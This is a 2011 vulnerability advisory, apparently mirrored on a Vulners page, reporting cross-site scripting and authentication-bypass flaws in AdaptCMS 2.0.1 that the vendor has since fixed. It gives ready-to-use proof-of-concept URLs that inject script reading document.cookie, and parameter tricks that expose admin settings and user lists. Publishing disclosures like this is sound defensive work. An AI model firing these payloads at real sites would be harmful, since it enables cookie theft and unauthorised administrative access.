Lucene search
K

AdaptCMS 2.0.1 Cross Site Scripting / Bypass

🗓️ 26 Sep 2011 00:00:00Reported by Stefan SchurtzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

AdaptCMS 2.0.1 Multiple security vulnerabilities, Cross Site Scripting, Bypass fixed by vendor

Code
`Advisory: AdaptCMS 2.0.1 Multiple security vulnerabilities  
Advisory ID: SSCHADV2011-018  
Author: Stefan Schurtz  
Affected Software: Successfully tested on AdaptCMS 2.0.1  
Vendor URL: http://www.adaptcms.com/  
Vendor Status: fixed  
CVE-ID: -  
  
==========================  
Vulnerability Description:  
==========================  
  
AdaptCMS 2.0.1 is prone to multiple security vulnerabilities  
  
==================  
Technical Details:  
==================  
  
Cross-site Scripting  
  
http://<target>/AdaptCMS/admin.php?view=</script><script>alert(document.cookie)</script>  
http://<target>/AdaptCMS/admin.php?view=share&do=</script><script>alert(document.cookie)</script>  
http://<target>/AdaptCMS//?'</script><script>alert(document.cookie)</script>  
http://<target>/AdaptCMS//index.php?'</script><script>alert(document.cookie)</script>  
  
Authentication bypass / Information Disclosure  
  
http://<target>/AdaptCMS/admin.php?view=/&view=settings  
http://<target>/AdaptCMS/admin.php?view=/&view=users  
http://<target>/AdaptCMS/admin.php?view=/&view=groups  
http://<target>/AdaptCMS/admin.php?view=/&view=levels  
http://<target>/AdaptCMS/admin.php?view=/&view=stats  
  
=========  
Solution:  
=========  
  
"Get the latest AdaptCMS Files" from the admin area  
  
====================  
Disclosure Timeline:  
====================  
  
24-Sep-2011 - informed developers  
24-Sep-2011 - Release date of this security advisory  
25-Sep-2011 - fixed by vendor  
25-Sep-2011 - post on BugTraq  
  
========  
Credits:  
========  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
===========  
References:  
===========  
  
http://www.adaptcms.com/  
http://www.insanevisions.com/article/293/News/AdaptCMS-201-Security-Hole  
http://www.rul3z.de/advisories/SSCHADV2011-018.txt  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation